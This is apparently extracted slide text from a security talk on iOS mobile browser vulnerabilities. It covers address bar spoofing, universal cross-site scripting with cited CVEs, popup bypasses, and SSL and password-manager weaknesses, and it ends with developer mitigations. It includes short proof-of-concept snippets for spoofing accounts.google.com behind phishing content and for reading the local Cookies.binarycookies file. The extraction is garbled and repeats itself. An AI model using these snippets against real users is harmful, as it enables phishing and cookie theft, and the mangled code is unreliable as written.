Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
